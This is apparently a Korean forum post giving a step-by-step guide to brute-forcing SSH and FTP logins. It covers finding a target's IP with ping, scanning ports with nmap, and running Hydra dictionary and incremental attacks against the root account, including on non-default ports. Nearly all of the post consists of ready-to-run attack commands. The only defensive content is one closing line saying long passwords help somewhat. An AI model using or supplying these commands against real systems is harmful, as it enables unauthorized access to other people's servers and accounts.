1. 대상 싸이트 조회
(1) 대상 싸이트 IP 확인하기
형식 : ping 도메인
예시 : ping test.com
(2) 열린 포트 여부 확인하기
형식 : nmap –sS IP
예시 : nmap –sS 192.168.0.100
2. 사전 파일 공격
-L 과 -P 옵션으로 사전파일을 이용해서 공격
많이 사용되는 단어를 모아서 아이디 및 패스워드 사전을 파일로 만들어서
무자별 대입함. 사전파일은 인터넷을 검색해서 구할수 있음
형식: hydra –L [아이디 사전파일] –P [비밀번호 사전파일] [대상 IP] ssh –V -f
# hydra -L user.txt -P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f
아이디는 고정해 놓고 비밀번호만 사전 파일로 무차별 대입할 경우
형식 : hydra –l [고정 아이디] –P [비밀번호 사전파일] [대상 IP] ssh –V -f
# hydra –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) -V –f
3. 순차 대입 공격
-x 옵션으로 비밀번호를 순차대입법으로 공격함.
-x 옵션 형식 : -x 옵션 다음에 숫자1:숫자2:a(A1특수문자)
숫자1은 최소자리수 / 숫자2는 최대자리수 / a 는 소문자 대표. a~z 전체를 의미함
/ A 는 대문자 대표. A~Z 전체를 의미함 / 1 은 숫자 대표. 0~9 전체를 의미함 /
특수문자는 각자 사용함.
# hydra -l root -x 4:4:a1 192.168.0.100 ssh(또는 ftp) -V –f
-x 옵션 예시)
1:5:a1 → 한자리 부터 5자리까지 소문자와 숫자를 조합해서 무차별 대입
6:6:1$ → 6자리로만 숫자와 특수문자$ 을 조합해서 무차별 대입
4:5:A1 → 4자리부터 5자리까지 대문자와 숫자를 조합해서 무차별 대입함
4. 수동 포트 옵션
공격 대상 PC의 서비스 포트가 디폴트가 아닌 경우 사용함.
형식 : -s [포트번호]
# hydra –s 3677 –l root –P pass.txt 192.168.0.100 ssh(또는 ftp) –V –f
# hydra –s 11175 –l root –x 4:5:A1 192.168.0.100 ssh(또는 ftp) -V -f
패스워드 길게 만들면 그래도 조금이나만 도움이 될것 같죠..
게시글 목록
| 번호 | 제목 |
|---|---|
| 1708 | |
| 1703 | |
| 1702 | |
| 1700 | |
| 1699 | |
| 1694 | |
| 1690 | |
| 1689 | |
| 1688 | |
| 1687 | |
| 1685 | |
| 1684 | |
| 1683 | |
| 1680 | |
| 1675 | |
| 1674 | |
| 1667 | |
| 1664 | |
| 1663 | |
| 1662 | |
| 1661 | |
| 1660 | |
| 1654 | |
| 1653 | |
| 1652 | |
| 1651 | |
| 1648 | |
| 1646 | |
| 1644 | |
| 1638 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기